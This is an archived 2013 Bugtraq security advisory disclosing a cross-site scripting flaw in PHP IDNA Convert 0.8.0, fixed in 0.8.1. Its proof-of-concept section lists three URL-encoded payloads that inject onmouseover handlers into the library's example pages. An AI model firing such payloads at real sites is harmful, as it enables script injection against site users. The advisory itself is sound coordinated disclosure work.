lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <52447CCD.4000609@ibliss.com.br>
Date: Fri, 27 Sep 2013 21:57:45 -0300
From: Alexandro Silva <alexos@...iss.com.br>
To: bugtraq@...urityfocus.com
Subject: [IBliss Security Advisory] Cross-site scripting ( XSS ) in PHP IDNA
 Convert

[ PHP IDNA Convert Cross-site scripting ( XSS ) ]

[ Vendor product description]

PHP Net_IDNA is a class to convert between the Punycode and Unicode
formats. Punycode is a standard described in RFC 3492 and part of IDNA
(Internationalizing Domain Names in Applications [RFC3490]) . This class
allows PHP scripts to convert these domain names without having one of
the PHP extensions installed. It supports both IDNA 2003 and IDNA 2008.

[ Bug Description ]

Cross-site scripting (XSS) vulnerability in parameters encoded/decoded
in the class PHP IDNA Convert allows remote attackers to inject
arbitrary web script or HTML.

[ History ]

Advisory sent to vendor on 09/24/2013
Vendor reply on 09/25/2013
Vulnerability fixed on 09/26/2013

[ Impact ]

HIGH

[ Afected Version ]

0.8.0

[ Vendor Reply ]

Yes. Version 0.8.1 released

[ CVE Reference ]



[ PoC ]

Payloads:

http://[host]/idna_convert/index.php?decoded=94102%22%20onmouseover%3dprompt(929882)%20bad%3d%22&encode=Encode%20>>&idn_version=2003

http://[host]/idna_convert/example.php?decode=<<%20Decode&encoded=94102%22%20onmouseover%3dprompt(938200)%20bad%3d%22

http://[host]/index.php/%22onmouseover%3d%27prompt%28976724%29%27bad%3d%22%3E

[ References ]

[1] PHP IDNA Convert - http://phlymail.com/en/downloads/idna-convert.html

[2] Owasp Cross-site scripting -
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/

--------------------------------------------
iBliss Segurança e InteligĂȘncia - Sponsor: Alexandro Silva - Alexos

alexos (at) ibliss.com (dot) br [email concealed]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ